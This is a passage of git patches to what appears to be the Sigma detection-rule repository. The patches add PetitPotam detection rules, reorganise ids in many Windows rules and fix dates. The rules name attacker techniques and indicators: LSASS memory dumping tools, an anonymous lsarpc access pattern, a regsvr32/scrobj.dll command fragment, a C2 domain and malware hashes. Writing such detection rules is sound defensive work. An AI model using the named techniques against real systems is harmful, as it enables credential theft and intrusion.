+tags: + - attack.credential_access + - attack.t1187 +logsource: + product: windows + service: security + definition: 'The advanced audit policy setting "Object Access > Detailed File Share" must be configured for Success/Failure' +detection: + selection: + EventID: 5145 + Share_Name: \\*\IPC$ + Relative_Target_Name: lsarpc + Account_Name: ANONYMOUS LOGON + condition: selection +falsepositives: + - Unknown. Feedback welcomed. +level: high diff --git a/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml new file mode 100644 index 00000000..da7fdf9e --- /dev/null +++ b/rules/windows/builtin/win_petitpotam_susp_tgt_request.yml @@ -0,0 +1,34 @@ +title: PetitPotam Suspicious Kerberos TGT Request +id: 6a53d871-682d-40b6-83e0-b7c1a6c4e3a5 +description: Detect suspicious Kerberos TGT requests. Once an attacer obtains a computer + certificate by abusing Active Directory Certificate Services in combination with + PetitPotam, the next step would be to leverage the certificate for malicious purposes. + One way of doing this is to request a Kerberos Ticket Granting Ticket using a tool + like Rubeus. This request will generate a 4768 event with some unusual fields depending + on the environment. This analytic will require tuning, we recommend filtering Account_Name + to the Domain Controller computer accounts. +author: Mauricio Velazco, Michael Haag +date: 2021/09/02 +references: + - https://github.com/topotam/PetitPotam + - https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/ + - https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml +tags: + - attack.credential_access + - attack.t1187 +logsource: + product: windows + service: security + definition: 'The advanced audit policy setting "Account Logon > Kerberos Authentication Service" must be configured for Success/Failure' +detection: + selection: + EventID: 4768 + Account_Name|endswith: '$' + Certificate_Thumbprint: '*' + filter_local: + Client_Address: '::1' + + condition: selection and not filter_local +falsepositives: + - False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts. +level: high From a6bb5574fb01fd768691599526f81e0aba1bffed Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 3 Sep 2021 06:35:35 +0200 Subject: [PATCH 0718/1367] Update global id --- rules/windows/builtin/win_net_ntlm_downgrade.yml | 3 ++- rules/windows/builtin/win_root_certificate_installed.yml | 3 ++- rules/windows/builtin/win_susp_eventlog_cleared.yml | 3 ++- .../windows/builtin/win_susp_failed_logons_single_source.yml | 3 ++- rules/windows/builtin/win_susp_zip_compress.yml | 4 +++- rules/windows/file_event/sysmon_hack_dumpert.yml | 3 ++- rules/windows/image_load/sysmon_tttracer_mod_load.yml | 3 ++- rules/windows/process_creation/win_advanced_ip_scanner.yml | 3 ++- rules/windows/process_creation/win_apt_turla_commands.yml | 3 ++- rules/windows/process_creation/win_apt_wocao.yml | 3 ++- .../windows/process_creation/win_exchange_transportagent.yml | 3 ++- rules/windows/process_creation/win_hktl_createminidump.yml | 3 ++- rules/windows/process_creation/win_mal_adwind.yml | 4 +++- .../windows/process_creation/win_silenttrinity_stage_use.yml | 3 ++- rules/windows/registry_event/sysmon_apt_pandemic.yml | 3 ++- 15 files changed, 32 insertions(+), 15 deletions(-) diff --git a/rules/windows/builtin/win_net_ntlm_downgrade.yml b/rules/windows/builtin/win_net_ntlm_downgrade.yml index 4269933d..062e6aa5 100644 --- a/rules/windows/builtin/win_net_ntlm_downgrade.yml +++ b/rules/windows/builtin/win_net_ntlm_downgrade.yml @@ -1,6 +1,5 @@ action: global title: NetNTLM Downgrade Attack -id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 description: Detects NetNTLM downgrade attack references: - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks @@ -18,6 +17,7 @@ falsepositives: - Unknown level: critical --- +id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2 logsource: product: windows category: registry_event @@ -34,6 +34,7 @@ detection: --- # Windows Security Eventlog: Process Creation with Full Command Line +id: d3abac66-f11c-4ed0-8acb-50cc29c97eed logsource: product: windows service: security diff --git a/rules/windows/builtin/win_root_certificate_installed.yml b/rules/windows/builtin/win_root_certificate_installed.yml index d0f67207..f670b8f4 100644 --- a/rules/windows/builtin/win_root_certificate_installed.yml +++ b/rules/windows/builtin/win_root_certificate_installed.yml @@ -1,6 +1,5 @@ action: global title: Root Certificate Installed -id: 42821614-9264-4761-acfc-5772c3286f76 status: experimental description: Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. references: @@ -16,6 +15,7 @@ falsepositives: detection: condition: 1 of them --- +id: 42821614-9264-4761-acfc-5772c3286f76 logsource: product: windows service: powershell @@ -31,6 +31,7 @@ detection: - 'Import-Certificate' - 'Cert:\LocalMachine\Root' --- +id: 46591fae-7a4c-46ea-aec3-dff5e6d785dc logsource: category: process_creation product: windows diff --git a/rules/windows/builtin/win_susp_eventlog_cleared.yml b/rules/windows/builtin/win_susp_eventlog_cleared.yml index e1e90819..ecd5b252 100644 --- a/rules/windows/builtin/win_susp_eventlog_cleared.yml +++ b/rules/windows/builtin/win_susp_eventlog_cleared.yml @@ -1,6 +1,5 @@ action: global title: Eventlog Cleared -id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 related: - id: f2f01843-e7b8-4f95-a35a-d23584476423 type: obsoletes @@ -21,6 +20,7 @@ falsepositives: - System provisioning (system reset before the golden image creation) level: high --- +id: d99b79d2-0a6f-4f46-ad8b-260b6e17f982 logsource: product: windows service: security @@ -31,6 +31,7 @@ detection: - 1102 condition: selection --- +id: a62b37e0-45d3-48d9-a517-90c1a1b0186b logsource: product: windows service: system diff --git a/rules/windows/builtin/win_susp_failed_logons_single_source.yml b/rules/windows/builtin/win_susp_failed_logons_single_source.yml index cf0ce27f..b4ad3b78 100644 --- a/rules/windows/builtin/win_susp_failed_logons_single_source.yml +++ b/rules/windows/builtin/win_susp_failed_logons_single_source.yml @@ -1,6 +1,5 @@ action: global title: Failed Logins with Different Accounts from Single Source System -id: e98374a6-e2d9-4076-9b5c-11bdb2569995 description: Detects suspicious failed logins with different user accounts from a single source system author: Florian Roth date: 2017/01/10 @@ -19,6 +18,7 @@ falsepositives: - Workstations with frequently changing users level: medium --- +id: e98374a6-e2d9-4076-9b5c-11bdb2569995 detection: selection1: EventID: @@ -28,6 +28,7 @@ detection: WorkstationName: '*' condition: selection1 | count(TargetUserName) by WorkstationName > 3 --- +id: 6309ffc4-8fa2-47cf-96b8-a2f72e58e538 detection: selection2: EventID: 4776 diff --git a/rules/windows/builtin/win_susp_zip_compress.yml b/rules/windows/builtin/win_susp_zip_compress.yml index 5534e42b..4f0ab147 100644 --- a/rules/windows/builtin/win_susp_zip_compress.yml +++ b/rules/windows/builtin/win_susp_zip_compress.yml @@ -1,6 +1,5 @@ action: global title: Zip A Folder With PowerShell For Staging In Temp -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 status: experimental author: frack113 date: 2021/07/20 @@ -14,6 +13,7 @@ falsepositives: - Unknown level: medium --- +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 logsource: product: windows category: process_creation @@ -26,6 +26,7 @@ detection: - '$env:TEMP\' condition: selection --- +id: 71ff406e-b633-4989-96ec-bc49d825a412 logsource: product: windows service: powershell-classic @@ -39,6 +40,7 @@ detection: - '$env:TEMP\' condition: selection --- +id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 logsource: product: windows service: powershell diff --git a/rules/windows/file_event/sysmon_hack_dumpert.yml b/rules/windows/file_event/sysmon_hack_dumpert.yml index a29ef780..8259b12c 100755 --- a/rules/windows/file_event/sysmon_hack_dumpert.yml +++ b/rules/windows/file_event/sysmon_hack_dumpert.yml @@ -1,6 +1,5 @@ action: global title: Dumpert Process Dumper -id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 description: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory author: Florian Roth references: @@ -16,6 +15,7 @@ falsepositives: - Very unlikely level: critical --- +id: 2704ab9e-afe2-4854-a3b1-0c0706d03578 logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: Imphash: '09D278F9DE118EF09163C6140255C690' condition: selection --- +id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8 logsource: category: file_event product: windows diff --git a/rules/windows/image_load/sysmon_tttracer_mod_load.yml b/rules/windows/image_load/sysmon_tttracer_mod_load.yml index 64f945e8..955ca591 100644 --- a/rules/windows/image_load/sysmon_tttracer_mod_load.yml +++ b/rules/windows/image_load/sysmon_tttracer_mod_load.yml @@ -1,6 +1,5 @@ action: global title: Time Travel Debugging Utility Usage -id: e76c8240-d68f-4773-8880-5c6f63595aaf description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ @@ -19,6 +18,7 @@ falsepositives: - Legitimate usage by software developers/testers level: high --- +id: e76c8240-d68f-4773-8880-5c6f63595aaf logsource: product: windows category: image_load @@ -29,6 +29,7 @@ detection: - '\ttdwriter.dll' - '\ttdloader.dll' --- +id: 0b4ae027-2a2d-4b93-8c7e-962caaba5b2a logsource: product: windows category: process_creation diff --git a/rules/windows/process_creation/win_advanced_ip_scanner.yml b/rules/windows/process_creation/win_advanced_ip_scanner.yml index a62d7260..92df8008 100644 --- a/rules/windows/process_creation/win_advanced_ip_scanner.yml +++ b/rules/windows/process_creation/win_advanced_ip_scanner.yml @@ -1,6 +1,5 @@ action: global title: Advanced IP Scanner -id: bef37fa2-f205-4a7b-b484-0759bfd5f86f status: experimental description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: @@ -19,6 +18,7 @@ falsepositives: - Legitimate administrative use level: medium --- +id: bef37fa2-f205-4a7b-b484-0759bfd5f86f logsource: category: process_creation product: windows @@ -27,6 +27,7 @@ detection: Image|contains: '\advanced_ip_scanner' condition: selection --- +id: fed85bf9-e075-4280-9159-fbe8a023d6fa logsource: category: file_event product: windows diff --git a/rules/windows/process_creation/win_apt_turla_commands.yml b/rules/windows/process_creation/win_apt_turla_commands.yml index dc84c432..61b55cf1 100755 --- a/rules/windows/process_creation/win_apt_turla_commands.yml +++ b/rules/windows/process_creation/win_apt_turla_commands.yml @@ -1,6 +1,5 @@ action: global title: Turla Group Lateral Movement -id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f status: experimental description: Detects automated lateral movement by Turla group references: @@ -24,6 +23,7 @@ logsource: falsepositives: - Unknown --- +id: c601f20d-570a-4cde-a7d6-e17f99cb8e7f detection: selection: CommandLine: @@ -33,6 +33,7 @@ detection: condition: selection level: critical --- +id: 75925535-ca97-4e0a-a850-00b5c00779dc detection: netCommand1: CommandLine: 'net view /DOMAIN' diff --git a/rules/windows/process_creation/win_apt_wocao.yml b/rules/windows/process_creation/win_apt_wocao.yml index af9a5711..977893ac 100644 --- a/rules/windows/process_creation/win_apt_wocao.yml +++ b/rules/windows/process_creation/win_apt_wocao.yml @@ -1,6 +1,5 @@ action: global title: Operation Wocao Activity -id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d author: Florian Roth, frack113 status: experimental description: Detects activity mentioned in Operation Wocao report @@ -25,6 +24,7 @@ falsepositives: - Administrators that use checkadmin.exe tool to enumerate local administrators level: high --- +id: 74ad4314-482e-4c3e-b237-3f7ed3b9ca8d logsource: product: windows service: security @@ -35,6 +35,7 @@ detection: CallerProcessName|endswith: '\checkadmin.exe' condition: selection --- +id: 1cfac73c-be78-4f9a-9b08-5bde0c3953ab logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_exchange_transportagent.yml b/rules/windows/process_creation/win_exchange_transportagent.yml index d432eada..4c7f7cee 100644 --- a/rules/windows/process_creation/win_exchange_transportagent.yml +++ b/rules/windows/process_creation/win_exchange_transportagent.yml @@ -1,6 +1,5 @@ action: global title: MSExchange Transport Agent Installation -id: 83809e84-4475-4b69-bc3e-4aad8568612f status: experimental description: Detects the Installation of a Exchange Transport Agent references: @@ -18,6 +17,7 @@ falsepositives: - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. level: medium --- +id: 83809e84-4475-4b69-bc3e-4aad8568612f logsource: product: windows category: process_creation @@ -25,6 +25,7 @@ detection: selection: CommandLine|contains: 'Install-TransportAgent' --- +id: 4fe151c2-ecf9-4fae-95ae-b88ec9c2fca6 logsource: product: windows service: msexchange-management diff --git a/rules/windows/process_creation/win_hktl_createminidump.yml b/rules/windows/process_creation/win_hktl_createminidump.yml index 821c3cd9..17e9927c 100644 --- a/rules/windows/process_creation/win_hktl_createminidump.yml +++ b/rules/windows/process_creation/win_hktl_createminidump.yml @@ -1,6 +1,5 @@ action: global title: CreateMiniDump Hacktool -id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d description: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine author: Florian Roth references: @@ -14,6 +13,7 @@ falsepositives: - Unknown level: high --- +id: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d logsource: category: process_creation product: windows @@ -24,6 +24,7 @@ detection: Imphash: '4a07f944a83e8a7c2525efa35dd30e2f' condition: 1 of them --- +id: db2110f3-479d-42a6-94fb-d35bc1e46492 logsource: product: windows category: file_event diff --git a/rules/windows/process_creation/win_mal_adwind.yml b/rules/windows/process_creation/win_mal_adwind.yml index d88aa5e3..1dc05a4a 100644 --- a/rules/windows/process_creation/win_mal_adwind.yml +++ b/rules/windows/process_creation/win_mal_adwind.yml @@ -1,6 +1,5 @@ action: global title: Adwind RAT / JRAT -id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 status: experimental description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: @@ -18,6 +17,7 @@ detection: condition: selection level: high --- +id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 logsource: category: process_creation product: windows @@ -32,6 +32,7 @@ detection: - 'Retrive' - '.vbs ' --- +id: 0bcfabcb-7929-47f4-93d6-b33fb67d34d1 logsource: category: file_event product: windows @@ -44,6 +45,7 @@ detection: - '\Retrive' - '.vbs' --- +id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 logsource: category: registry_event product: windows diff --git a/rules/windows/process_creation/win_silenttrinity_stage_use.yml b/rules/windows/process_creation/win_silenttrinity_stage_use.yml index 66fa5a3f..d4699449 100644 --- a/rules/windows/process_creation/win_silenttrinity_stage_use.yml +++ b/rules/windows/process_creation/win_silenttrinity_stage_use.yml @@ -1,6 +1,5 @@ action: global title: SILENTTRINITY Stager Execution -id: 03552375-cc2c-4883-bbe4-7958d5a980be status: experimental description: Detects SILENTTRINITY stager use references: @@ -18,10 +17,12 @@ falsepositives: - unknown level: high --- +id: 03552375-cc2c-4883-bbe4-7958d5a980be logsource: category: process_creation product: windows --- +id: 75c505b1-711d-4f68-a357-8c3fe37dbf2d logsource: category: image_load product: windows diff --git a/rules/windows/registry_event/sysmon_apt_pandemic.yml b/rules/windows/registry_event/sysmon_apt_pandemic.yml index f53bf33c..e0f2d122 100755 --- a/rules/windows/registry_event/sysmon_apt_pandemic.yml +++ b/rules/windows/registry_event/sysmon_apt_pandemic.yml @@ -1,6 +1,5 @@ action: global title: Pandemic Registry Key -id: 47e0852a-cf81-4494-a8e6-31864f8c86ed status: experimental description: Detects Pandemic Windows Implant references: @@ -22,6 +21,7 @@ falsepositives: - unknown level: critical --- +id: 47e0852a-cf81-4494-a8e6-31864f8c86ed logsource: category: registry_event product: windows @@ -30,6 +30,7 @@ detection: TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance' condition: 1 of them --- +id: 9fefd33c-339d-4495-9cba-b96ca006f512 logsource: category: process_creation product: windows From 135d0a2c61d2941ad29795a8eafe7a579d98e5f5 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 3 Sep 2021 06:50:00 +0200 Subject: [PATCH 0719/1367] Update global id --- .../windows/other/win_defender_exclusions.yml | 15 +++++------- .../process_creation/win_apt_chafer_mar18.yml | 5 +++- .../process_creation/win_apt_empiremonkey.yml | 24 +++++++------------ .../process_creation/win_apt_gallium.yml | 3 ++- .../process_creation/win_apt_slingshot.yml | 3 ++- .../win_apt_unidentified_nov_18.yml | 6 ++--- .../win_susp_winrm_AWL_bypass.yml | 3 ++- .../win_syncappvpublishingserver_exe.yml | 3 ++- 8 files changed, 29 insertions(+), 33 deletions(-) diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml index 29e56c90..5021ed75 100644 --- a/rules/windows/other/win_defender_exclusions.yml +++ b/rules/windows/other/win_defender_exclusions.yml @@ -1,6 +1,5 @@ action: global title: Windows Defender Exclusions Added -id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f description: Detects the Setting of Windows Defender Exclusions date: 2021/07/06 author: Christian Burkard @@ -15,24 +14,22 @@ falsepositives: - Administrator actions level: medium --- +id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f logsource: product: windows service: windefend detection: selection1: - EventID: - - 5007 - New Value|contains: - - '\Microsoft\Windows Defender\Exclusions' + EventID: 5007 + New Value|contains: '\Microsoft\Windows Defender\Exclusions' condition: selection1 --- +id: a982fc9c-6333-4ffb-a51d-addb04e8b529 logsource: product: windows category: registry_event detection: selection2: - EventID: - - 13 - TargetObject|contains: - - '\Microsoft\Windows Defender\Exclusions' + EventID: 13 + TargetObject|contains: '\Microsoft\Windows Defender\Exclusions' condition: selection2 diff --git a/rules/windows/process_creation/win_apt_chafer_mar18.yml b/rules/windows/process_creation/win_apt_chafer_mar18.yml index a64f9629..ad32e036 100755 --- a/rules/windows/process_creation/win_apt_chafer_mar18.yml +++ b/rules/windows/process_creation/win_apt_chafer_mar18.yml @@ -1,6 +1,5 @@ action: global title: Chafer Activity -id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ @@ -26,6 +25,7 @@ falsepositives: - Unknown level: critical --- +id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 logsource: product: windows service: system @@ -36,6 +36,7 @@ detection: - 'SC Scheduled Scan' - 'UpdatMachine' --- +id: c0580559-a6bd-4ef6-b9b7-83703d98b561 logsource: product: windows service: security @@ -46,6 +47,7 @@ detection: - 'SC Scheduled Scan' - 'UpdatMachine' --- +id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 logsource: category: registry_event product: windows @@ -55,6 +57,7 @@ detection: - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe' - 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT' --- +id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 logsource: category: process_creation product: windows diff --git a/rules/windows/process_creation/win_apt_empiremonkey.yml b/rules/windows/process_creation/win_apt_empiremonkey.yml index 55efdc51..93b94f14 100644 --- a/rules/windows/process_creation/win_apt_empiremonkey.yml +++ b/rules/windows/process_creation/win_apt_empiremonkey.yml @@ -1,4 +1,3 @@ -action: global title: Empire Monkey id: 10152a7b-b566-438f-a33c-390b607d1c8d description: Detects EmpireMonkey APT reported Activity @@ -11,24 +10,17 @@ tags: date: 2019/04/02 modified: 2020/08/27 author: Markus Neis -detection: - condition: 1 of them -falsepositives: - - Very Unlikely -level: critical ---- logsource: category: process_creation product: windows detection: selection_cutil: - CommandLine|endswith: - - '/i:%APPDATA%\logs.txt scrobj.dll' - Image|endswith: - - '\cutil.exe' + CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll' + Image|endswith: '\cutil.exe' selection_regsvr32: - CommandLine|endswith: - - '/i:%APPDATA%\logs.txt scrobj.dll' - Description: - - Microsoft(C) Registerserver - + CommandLine|endswith: '/i:%APPDATA%\logs.txt scrobj.dll' + Description: 'Microsoft(C) Registerserver' + condition: 1 of them +falsepositives: + - Very Unlikely +level: critical \ No newline at end of file diff --git a/rules/windows/process_creation/win_apt_gallium.yml b/rules/windows/process_creation/win_apt_gallium.yml index 5ec55428..3c5279f3 100644 --- a/rules/windows/process_creation/win_apt_gallium.yml +++ b/rules/windows/process_creation/win_apt_gallium.yml @@ -1,6 +1,5 @@ action: global title: GALLIUM Artefacts -id: 440a56bf-7873-4439-940a-1c8a671073c2 status: experimental description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. author: Tim Burrell @@ -42,6 +41,7 @@ detection: - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2' condition: exec_selection --- +id: 440a56bf-7873-4439-940a-1c8a671073c2 logsource: product: windows service: dns-server @@ -58,6 +58,7 @@ detection: - 'cvdfhjh1231.ddns.net' condition: c2_selection --- +id: 18739897-21b1-41da-8ee4-5b786915a676 logsource: product: windows category: process_creation diff --git a/rules/windows/process_creation/win_apt_slingshot.yml b/rules/windows/process_creation/win_apt_slingshot.yml index 51589931..14205108 100755 --- a/rules/windows/process_creation/win_apt_slingshot.yml +++ b/rules/windows/process_creation/win_apt_slingshot.yml @@ -1,6 +1,5 @@ action: global title: Defrag Deactivation -id: 958d81aa-8566-4cea-a565-59ccd4df27b0 author: Florian Roth, Bartlomiej Czyz (@bczyz1) date: 2019/03/04 modified: 2020/11/05 @@ -16,6 +15,7 @@ falsepositives: - Unknown level: medium --- +id: 958d81aa-8566-4cea-a565-59ccd4df27b0 logsource: category: process_creation product: windows @@ -29,6 +29,7 @@ detection: - '/TN' - '\Microsoft\Windows\Defrag\ScheduledDefrag' --- +id: c5a178bf-9cfb-4340-b584-e4df39b6a3e7 logsource: product: windows service: security diff --git a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml index 20e60b32..1ff40f48 100644 --- a/rules/windows/process_creation/win_apt_unidentified_nov_18.yml +++ b/rules/windows/process_creation/win_apt_unidentified_nov_18.yml @@ -1,6 +1,5 @@ action: global title: Unidentified Attacker November 2018 -id: 7453575c-a747-40b9-839b-125a0aae324b status: stable description: A sigma rule detecting an unidetefied attacker who used phishing emails to target high profile orgs on November 2018. The Actor shares some TTPs with YYTRIUM/APT29 campaign in 2016. @@ -17,6 +16,7 @@ detection: condition: 1 of them level: high --- +id: 7453575c-a747-40b9-839b-125a0aae324b logsource: category: process_creation product: windows @@ -25,11 +25,11 @@ detection: CommandLine|contains: 'cyzfc.dat,' CommandLine|endswith: 'PointFunctionCall' --- +id: 3a3f81ca-652c-482b-adeb-b1c804727f74 # Sysmon: File Creation (ID 11) logsource: product: windows category: file_event detection: selection2: - TargetFilename|contains: - - 'ds7002.lnk' + TargetFilename|contains: 'ds7002.lnk' diff --git a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml index 5ed59281..fd21e69f 100644 --- a/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml +++ b/rules/windows/process_creation/win_susp_winrm_AWL_bypass.yml @@ -1,6 +1,5 @@ action: global title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl -id: 074e0ded-6ced-4ebd-8b4d-53f55908119d description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) status: experimental references: @@ -14,6 +13,7 @@ level: medium falsepositives: - Unlikely --- +id: 074e0ded-6ced-4ebd-8b4d-53f55908119d logsource: category: process_creation product: windows @@ -32,6 +32,7 @@ detection: CommandLine|contains: 'winrm' condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder) --- +id: d353dac0-1b41-46c2-820c-d7d2561fc6ed logsource: product: windows category: file_event diff --git a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml b/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml index e29504f5..fb4c81e3 100644 --- a/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml +++ b/rules/windows/process_creation/win_syncappvpublishingserver_exe.yml @@ -1,6 +1,5 @@ action: global title: SyncAppvPublishingServer Execution to Bypass Powershell Restriction -id: fde7929d-8beb-4a4c-b922-be9974671667 description: Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions. references: - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ @@ -15,6 +14,7 @@ falsepositives: - App-V clients level: medium --- +id: fde7929d-8beb-4a4c-b922-be9974671667 logsource: product: windows category: process_creation @@ -22,6 +22,7 @@ detection: selection: Image|endswith: '\SyncAppvPublishingServer.exe' --- +id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299 logsource: product: windows service: powershell From 11e4b900e44d71bfc76eeb0e1e299c187a6580a3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 3 Sep 2021 06:59:40 +0200 Subject: [PATCH 0720/1367] Update global id --- rules/windows/process_creation/win_apt_gallium.yml | 3 ++- tools/sigma/sigma_uuid.py | 2 -- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/process_creation/win_apt_gallium.yml b/rules/windows/process_creation/win_apt_gallium.yml index 3c5279f3..41d7f628 100644 --- a/rules/windows/process_creation/win_apt_gallium.yml +++ b/rules/windows/process_creation/win_apt_gallium.yml @@ -14,6 +14,7 @@ falsepositives: - unknown level: high --- +id: 440a56bf-7873-4439-940a-1c8a671073c2 logsource: product: windows category: process_creation @@ -41,7 +42,7 @@ detection: - 'ddd2db1127632a2a52943a2fe516a2e7d05d70d2' condition: exec_selection --- -id: 440a56bf-7873-4439-940a-1c8a671073c2 +id: 3db10f25-2527-4b79-8d4b-471eb900ee29 logsource: product: windows service: dns-server diff --git a/tools/sigma/sigma_uuid.py b/tools/sigma/sigma_uuid.py index 8875004b..b9b07f05 100755 --- a/tools/sigma/sigma_uuid.py +++ b/tools/sigma/sigma_uuid.py @@ -69,11 +69,9 @@ def main(): except ValueError: # id is not a valid UUID print("Rule {} in file {} has a malformed UUID '{}'.".format(i, str(path), rule["id"])) passed = False - exit() except KeyError: # rule has no id print("Rule {} in file {} has no UUID.".format(i, str(path))) passed = False - exit() ''' else: newrules = list() From 864286e2060ce02b5e3d58e3b37ea9552102a9eb Mon Sep 17 00:00:00 2001 From: Pawel Mazur Date: Fri, 3 Sep 2021 11:33:18 +0200 Subject: [PATCH 0721/1367] New Rule - Linux-Auditd-System Information Discovery --- .../lnx_auditd_system_info_discovery.yml | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 rules/linux/auditd/lnx_auditd_system_info_discovery.yml diff --git a/rules/linux/auditd/lnx_auditd_system_info_discovery.yml b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml new file mode 100644 index 00000000..56fba47f --- /dev/null +++ b/rules/linux/auditd/lnx_auditd_system_info_discovery.yml @@ -0,0 +1,30 @@ +title: 'System Information Discovery' +description: 'Detects System Information Discovery commands' +author: 'Pawel Mazur' +status: experimental +date: 2021/09/03 +references: + - 'https://attack.mitre.org/techniques/T1082/' + - 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md' +logsource: + product: linux + service: auditd +detection: + selection: + type: PATH + name: + - /etc/lsb-release + - /etc/redhat-release + - /etc/issue + condition: 'selection or selection2' + selection2: + type: EXECVE + a0: + - uname + - uptime +tags: + - attack.discovery + - attack.t1082 +falsepositives: + - 'Legitimate administrative activity' +level: low From adc3c9e6087654ca35968bd33548d254f903acfd Mon Sep 17 00:00:00 2001 From: ncrqnt Date: Fri, 3 Sep 2021 12:03:38 +0200 Subject: [PATCH 0722/1367] fixed date: switched day/month --- .../win_arbitrary_shell_execution_via_settingcontent.yml | 2 +- rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml | 2 +- ...in_sticky_keys_unauthenticated_privileged_console_access.yml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml index fffa3a9e..8ba7965c 100644 --- a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml +++ b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml @@ -2,7 +2,7 @@ title: Arbitrary Shell Command Execution Via Settingcontent-Ms id: 24de4f3b-804c-4165-b442-5a06a2302c7e description: The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. author: Sreeman -date: 2020/13/03 +date: 2020/03/13 modified: 2021/08/09 references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 diff --git a/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml b/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml index 09845cc8..a3e942b8 100644 --- a/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml +++ b/rules/windows/builtin/win_asr_bypass_via_appvlp_re.yml @@ -3,7 +3,7 @@ id: 9c7e131a-0f2c-4ae0-9d43-b04f4e266d43 status: experimental description: 'Application Virtualization Utility is included with Microsoft Office.We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule folder or to mark a file as a system file' author: Sreeman -date: 2020/13/03 +date: 2020/03/13 modified: 2021/06/11 tags: - attack.t1218 diff --git a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml index 715dfc75..18cddb9e 100644 --- a/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml +++ b/rules/windows/process_creation/win_sticky_keys_unauthenticated_privileged_console_access.yml @@ -5,7 +5,7 @@ references: - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html - 